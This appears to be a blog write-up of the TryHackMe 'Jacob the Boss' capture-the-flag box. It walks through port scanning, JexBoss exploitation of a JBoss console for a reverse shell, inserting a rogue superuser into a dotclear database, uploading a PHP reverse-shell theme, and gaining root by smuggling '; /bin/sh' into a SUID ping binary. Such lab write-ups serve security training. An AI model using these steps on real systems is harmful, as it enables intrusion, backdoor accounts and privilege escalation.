TryHackMe – Jacob the Boss – Middle of the Web

Description: “Well, the flaw that makes up this box is the reproduction found in the production environment of a customer a while ago, the verification in season consisted of two steps, the last one within the environment, we hit it head-on and more than 15 machines were vulnerable that together with the development team we were able to correct and adapt.

*First of all, add the jacobtheboss.box address to your hosts file.

Anyway, learn a little more, have fun!”

Tags: security, dotclear, exploit, jboss

TryHackMe Difficulty: Medium

Let’s start with an nmap/gobuster (assuming port 80) on the target.

Nmap:

odin@asgard:~$ nmap -sV -sC 10.10.174.124
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-09 16:07 EDT
Nmap scan report for 10.10.174.124
Host is up (0.088s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:ca:13:6e:d9:63:c0:5f:4a:23:a5:a5:a5:10:3c:7f (RSA)
| 256 a4:6e:d2:5d:0d:36:2e:73:2f:1d:52:9c:e5:8a:7b:04 (ECDSA)
|_ 256 6f:54:a6:5e:ba:5b:ad:cc:87:ee:d3:a8:d5:e0:aa:2a (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.3.20)
|http-server-header: Apache/2.4.6 (CentOS) PHP/7.3.20 |_http-title: My first blog 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind
1090/tcp open java-rmi Java RMI
|rmi-dumpregistry: ERROR: Script execution failed (use -d to debug) 1098/tcp open java-rmi Java RMI 1099/tcp open java-object Java Object Serialization | fingerprint-strings: | NULL: | java.rmi.MarshalledObject| | hash[ | locBytest | objBytesq | xpJV | http://jacobtheboss.box:8083/q | org.jnp.server.NamingServer_Stub | java.rmi.server.RemoteStub | java.rmi.server.RemoteObject | xpw; | UnicastRef2 | jacobtheboss.box
3306/tcp open mysql MariaDB (unauthorized)
4444/tcp open java-rmi Java RMI
4445/tcp open java-object Java Object Serialization
4446/tcp open java-object Java Object Serialization
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
| Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS
| Potentially risky methods: PUT DELETE TRACE
|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Welcome to JBoss™
8083/tcp open http JBoss service httpd
|_http-title: Site doesn’t have a title (text/html).
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port1099-TCP:V=7.80%I=7%D=10/9%Time=5F80C309%P=x86_64-pc-linux-gnu%r(NU
SF:LL,16F,”\xac\xed\0\x05sr\0\x19java.rmi.MarshalledObject|\xbd\x1e\x97
SF:\xedc\xfc>\x02\0\x03I\0\x04hash[\0\x08locBytest\0\x02[B[\0\x08objByt
SF:esq\0~\0\x01xpJV\x85\xdfur\0\x02[B\xac\xf3\x17\xf8\x06\x08T\xe0\x02\0\
SF:0xp\0\0\0.\xac\xed\0\x05t\0\x1dhttp://jacobtheboss.box:8083/q\0~\0\0q
SF:\0~\0\0uq\0~\0\x03\0\0\0\xc7\xac\xed\0\x05sr\0\x20org.jnp.server.Nam
SF:ingServer_Stub\0\0\0\0\0\0\0\x02\x02\0\0xr\0\x1ajava.rmi.server.Remo
SF:teStub\xe9\xfe\xdc\xc9\x8b\xe1e\x1a\x02\0\0xr\0\x1cjava.rmi.server.R
SF:emoteObject\xd3a\xb4\x91\x0ca3\x1e\x03\0\0xpw;\0\x0bUnicastRef2\0\0\x10
SF:jacobtheboss.box\0\0\x04J\0\0\0\0\0\0\0\0[\xb4\x1f\x04\0\0\x01u\x0e\x
SF:f6\x0cF\x80\0\0x”);
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port4445-TCP:V=7.80%I=7%D=10/9%Time=5F80C30F%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4,”\xac\xed\0\x05″);
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port4446-TCP:V=7.80%I=7%D=10/9%Time=5F80C30F%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4,”\xac\xed\0\x05″);

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.93 seconds

gobuster:

odin@asgard:~$ gobuster dir -u http://jacobtheboss.box -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://jacobtheboss.box
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/09 16:15:09 Starting gobuster
===============================================================
/themes (Status: 301)
/public (Status: 301)
/admin (Status: 301)
/plugins (Status: 403)
/db (Status: 403)
/cache (Status: 403)
/inc (Status: 403)
/LICENSE (Status: 200)
/var (Status: 403)
/CHANGELOG (Status: 200)
/CREDITS (Status: 200)
/locales (Status: 301)
===============================================================
2020/10/09 16:46:50 Finished
===============================================================

We have ssh on 22, web server(s) on 80, 8080, and 8083, along with mysql, rpc, and a few other Java on other misc. ports.

Doing a manual assessment on the port 80 web server, we have noted that this is a ‘dotclear‘ CMS. Some research into this yields us a few different holes of access, but most requiring authorized access. But we’ve got 2 other identified web servers, let’s give those a look. The 8080 web server yields us a JBoss Management page (now we understand the name of the box?). Perfect. JBoss is well known for having many possible flaws. We’ll investigate this a bit further.

Navigating to the /web-console/, we can see the “Morpheus” version of JBoss (5.0.0.GA). I wanted to attempt this manually, so I started following ‘Exploiting JBoss like a Boss‘. The article states the vulnerable versions as ‘JBoss Application Server versions: 3, 4, 5 and 6.’ through exploiting the upload of a malicious WAR file. Following the included steps, I was able to locate the MainDeployer service, but I did not see the noted ‘void deploy()’ mentioned, so a bit more research was done. Digging deeper down Google, I was able to locate JexBoss, a ‘tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc.’ This sounds exactly like what we’d want to make our life easier!

After installing per the instructions, let’s see what happens. We’ll start a netcat listener:

odin@asgard:~$ nc -lvnp 4444
listening on [any] 4444 …

And run our script:

odin@asgard:~/jexboss$ sudo python jexboss.py -host http://jacobtheboss.box:8080
…

* — JexBoss: Jboss verify and EXploitation Tool — *
| * And others Java Deserialization Vulnerabilities * |
| |
| @author: João Filho Matos Figueiredo |
| @contact: joaomatosf@gmail.com |
| |
| @update: https://github.com/joaomatosf/jexboss |
#______________________________________________________#

@version: 1.2.4

* Checking for updates in: http://joaomatosf.com/rnp/releases.txt **

** Checking Host: http://jacobtheboss.box:8080 **

[*] Checking admin-console: [ OK ]
[*] Checking Struts2: [ OK ]
[*] Checking Servlet Deserialization: [ OK ]
[*] Checking Application Deserialization: [ OK ]
[*] Checking Jenkins: [ OK ]
[*] Checking web-console: [ VULNERABLE ]
[*] Checking jmx-console: [ VULNERABLE ]
[*] Checking JMXInvokerServlet: [ VULNERABLE ]

* Do you want to try to run an automated exploitation via “web-console” ?
If successful, this operation will provide a simple command shell to execute
commands on the server..
Continue only if you have permission!
yes/NO? yes

* Sending exploit code to http://jacobtheboss.box:8080. Please wait…

* Please enter the IP address and tcp PORT of your listening server for try to get a REVERSE SHELL.
OBS: You can also use the –cmd “command” to send specific commands to run on the server.
IP Address (RHOST): 10.6.22.82
Port (RPORT): 4444

* The exploit code was successfully sent. Check if you received the reverse shell
connection on your server or if your command was executed.
Type [ENTER] to continue…

Switching back to our nc tab:

connect to [10.6.22.82] from (UNKNOWN) [10.10.18.14] 57652
bash: no job control in this shell
[jacob@jacobtheboss /]$

Looks like we’re in. Based on the shell, it looks like we’re in the root of the file system, logged in as ‘jacob’. Do we have a home directory? Do we have a flag?

[jacob@jacobtheboss /]$ cd /home/jacob
cd /home/jacob
[jacob@jacobtheboss ~]$ ls -lah
ls -lah
total 16K
drwx——. 2 jacob jacob 78 Jul 31 10:23 .
drwxr-xr-x. 3 root root 19 Jul 30 22:05 ..
-rw-r–r–. 1 jacob jacob 18 Apr 1 2020 .bash_logout
-rw-r–r–. 1 jacob jacob 193 Apr 1 2020 .bash_profile
-rw-r–r–. 1 jacob jacob 231 Apr 1 2020 .bashrc
-rw-r–r–. 1 jacob jacob 33 Jul 31 10:23 user.txt

Yes, we have a flag. Let’s see it.

[jacob@jacobtheboss ~]$ cat /home/jacob/user.txt
cat /home/jacob/user.txt
*****************************cbcc

Now can we get root? Technically, yes, but I spent way too much time on this for something we could have done as ‘jacob’. We’ll continue on my methods until we reach the “final” solution.

I started an HTTP server on my host, and uploaded LinPEAS to the box. Running this gave us a lot of interesting output. One of which, was we’re able to run MySQL, as the root SQL user account.

Also of note, the basic shell gave me a lot of stability issues, I recommend getting something more stable

python -c 'import pty;pty.spawn("/bin/bash")'

Anyhow, back to the open MySQL. Being as I do some database administration along with my ‘jack of all trades’ security analyst day job duties, this was great news to me. I went down a few routes of seeing what we could exploit from within, such as this route by Pavan, and GTFObins. After no luck, I went to the basics – we have MySQL root, we can create users

[jacob@jacobtheboss /]$ mysql -u root
mysql -u root
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 4
Server version: 5.5.65-MariaDB MariaDB Server

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

MariaDB [(none)]> SHOW DATABASES;
SHOW DATABASES;
+——————–+
| Database |
+——————–+
| information_schema |
| dotclear |
| mysql |
| performance_schema |
| test |
+——————–+
5 rows in set (0.01 sec)

dotclear…wasn’t this our CMS from earlier? Dig…

MariaDB [(none)]> use dotclear
use dotclear
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [dotclear]> SHOW TABLES;
SHOW TABLES;
+——————–+
| Tables_in_dotclear |
+——————–+
| dc_blog |
| dc_category |
| dc_comment |
| dc_link |
| dc_log |
| dc_media |
| dc_meta |
| dc_permissions |
| dc_ping |
| dc_post |
| dc_post_media |
| dc_pref |
| dc_session |
| dc_setting |
| dc_spamrule |
| dc_user |
| dc_version |
+——————–+
17 rows in set (0.00 sec)

MariaDB [dotclear]> SELECT * FROM dc_user;
SELECT * FROM dc_user;
+———+————+————-+————————————————————–+—————–+——————+———–+—————-+——————+——————-+———-+———–+——————-+————————————————————————————————————————————————————————————————-+———–+—————+——————+———————+———————+
| user_id | user_super | user_status | user_pwd | user_change_pwd | user_recover_key | user_name | user_firstname | user_displayname | user_email | user_url | user_desc | user_default_blog | user_options | user_lang | user_tz | user_post_status | user_creadt | user_upddt |
+———+————+————-+————————————————————–+—————–+——————+———–+—————-+——————+——————-+———-+———–+——————-+————————————————————————————————————————————————————————————————-+———–+—————+——————+———————+———————+
| jacob | 1 | 1 | $2y$10$tICrvcvuwEQTwGhiT9F.6elbty1McHou9pFTFZTQL3oMqbPihr5YG | 0 | NULL | the Boss | Jacob | NULL | jacob@theboss.box | NULL | NULL | NULL | a:5:{s:9:”edit_size”;i:24;s:14:”enable_wysiwyg”;b:1;s:14:”toolbar_bottom”;b:0;s:6:”editor”;a:2:{s:5:”xhtml”;s:10:”dcCKEditor”;s:4:”wiki”;s:14:”dcLegacyEditor”;}s:11:”post_format”;s:4:”wiki”;} | pt | Europe/London | -2 | 2020-07-31 09:38:35 | 2020-07-31 09:38:35 |
+———+————+————-+————————————————————–+—————–+——————+———–+—————-+——————+——————-+———-+———–+——————-+————————————————————————————————————————————————————————————————-+———–+—————+——————+———————+———————+
1 row in set (0.00 sec)

Jacob…well, we know how Jacob is constructed. Can we insert ourselves into this?

MariaDB [dotclear]> INSERT INTO dc_user(user_id, user_super, user_status, user_pwd, user_change_pwd, user_name, user_firstname) VALUES(‘hacker’,’1′,’1′,’$2a$10$SmR13sEGX4FV/yrHjH8B6.DFY0TLOjFr.x2.7uQMZZANLCRXHspWS’,’0′,’hacker’,’hacker’);
<FY0TLOjFr.x2.7uQMZZANLCRXHspWS’,’0′,’hacker’,’hacker’);
Query OK, 1 row affected (0.00 sec)

What did we do? We were able to insert a user ‘hacker’ into the ‘dc_user’ table with the bcrypt’ed hash for ‘password’. Can we login to the web portal (http://jacobtheboss.box/admin/auth.php) now on port 80? Yes, we can. And now that we’re in, we should do some research.

I found a lot of resources pointing to CVE-2018-16358, and CVE-2016-9268, but I didn’t see much for our listed version. I know this says 2.16.9, but sometimes things are a) not actually patched, or b) can still be performed manually. Let’s see if we can use CVE-2016-9268 (for 2.10.4) to recreate this same exploit. If we navigate to http://jacobtheboss.box/themes/, we’ll notice that the only similar item in the themes, is ‘_define.php‘, so can we upload a malicious .zip file mimicking one of these themes, along with a reverse shell?

I pulled down the ‘_define.php’ file, along with a few other misc. files to create a mock file. Our ‘malicious.php’ is the PHP Reverse Shell from pentestmonkey. We’ve already added our RHOST and RPORT. Let’s package it.

odin@asgard:~/Downloads/dotclear$ ls -lah
total 44K
drwxr-xr-x 4 odin odin 4.0K Oct 13 13:02 .
drwxr-xr-x 9 odin odin 4.0K Oct 12 14:20 ..
-rw-r–r– 1 odin odin 251 Oct 12 14:44 _define.php
drwxr-xr-x 2 odin odin 4.0K Oct 12 14:18 img
-rw-r–r– 1 odin odin 5.4K Oct 12 14:59 malicious.php
-rw-r–r– 1 odin odin 636 Oct 12 14:18 print.css
drwxr-xr-x 2 odin odin 4.0K Oct 12 14:19 smilies
-rw-r–r– 1 odin odin 8.8K Oct 12 14:17 style.css
odin@asgard:~/Downloads/dotclear$ zip dotclear.zip *
adding: _define.php (deflated 26%)
adding: img/ (stored 0%)
adding: malicious.php (deflated 59%)
adding: print.css (deflated 47%)
adding: smilies/ (stored 0%)
adding: style.css (deflated 75%)

We’ll need to take our malicious .zip file, and upload it here:

Looks like this was successful!

Now, let’s start our shell. Set your nc listener on the RPORT you set in the reverse shell, and navigate to our path of http://jacobtheboss.box/themes/dotclear/malicious.php.

odin@asgard:~$ nc -lvnp 4444
listening on [any] 4444 …
connect to [10.6.22.82] from (UNKNOWN) [10.10.190.9] 49438
Linux jacobtheboss.box 3.10.0-1127.18.2.el7.x86_64 #1 SMP Sun Jul 26 15:27:06 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
19:01:12 up 1:00, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh: no job control in this shell
sh-4.2$ python -c ‘import pty;pty.spawn(“/bin/bash”)’
python -c ‘import pty;pty.spawn(“/bin/bash”)’
bash-4.2$ whoami
whoami
apache

So now we have shell access for 2 different users. We’ll pull down LinPEAS again to see if anything has changed (Hint: not much has).

One thing to note, is the OS: Linux version 3.10.0-1127.18.2.el7.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-39) (GCC) ) #1 SMP Sun Jul 26 15:27:06 UTC 2020. I think this is something that cause oversight on my part. I have worked with RHEL during my 9-5 for about 5 years, so I am familar with a bit of the IBM system commands. Thinking back on our walkthrough of ‘Blog‘, the SUID binary files proved vital.

bash-4.2$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/pingsys
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/mount
/usr/bin/chage
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/passwd
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper

I reached out to AJ (our UltraMegaChicken web guru) for a second set of eyes, since not only do I have ‘jacob’, but I have ‘apache’, and a few hours of looking has made them all a blur. I wanted insight into a possibly overlooked ‘apache’ user vulerability I might have missed. I sent him the items I’d found so far. He had assumed this was an Ubuntu box, and immediately noticed ‘pingsys’ didn’t look like something he had seen. I indicated what pingsys does, but then started some research.

bash-4.2$ pingsys
pingsys
bash: -c: line 0: syntax error near unexpected token `(‘
bash: -c: line 0: `ping -c 4 (null)’
bash-4.2$ ltrace pingsys
ltrace pingsys
bash: ltrace: command not found
bash-4.2$ man pingsys
man pingsys
No manual entry for pingsys

We don’t have ltrace, fun. No man page? Suspicious. Looking further into ‘pingsys vulerability’, I found this article. We have our vuln. Let’s try it out.

bash-4.2$ pingsys ‘127.0.0.1; /bin/sh’
pingsys ‘127.0.0.1; /bin/sh’
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.014 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.027 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.027 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.027 ms

— 127.0.0.1 ping statistics —
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.014/0.023/0.027/0.008 ms
bash-4.2# whoami
whoami
root

We have root! Our semicolon delimited the commands in that string, allowing /bin/sh to run as root, and thus allowing us to continue as root.

Let’s get our flag.

sh-4.2# cat /root/root.txt
cat /root/root.txt
*****************************2806

I went back on this box, and attempted the same steps as the ‘jacob’ user, which worked. So overall, this could have been done much faster. But it was a great experience in stringing together different vectors. Another few take aways from this box:

Try and obtain a stable shell earlier on. I must have dropped the base multiple times.
Use all of your resources. Don’t be afraid to ‘think tank’ with like minded individuals. Our core CTF group has an amazing mass of talent, and I’m lucky to be able to call upon them.
Don’t give up. You’ll stare at screens for hours with the same results – so get up, take a walk, grab some coffee, and come back with a fresh perspective.

TryHackMe – Jacob the Boss

Published by Phil

Leave a comment Cancel reply

Share this:

Related

Published by Phil

Leave a comment Cancel reply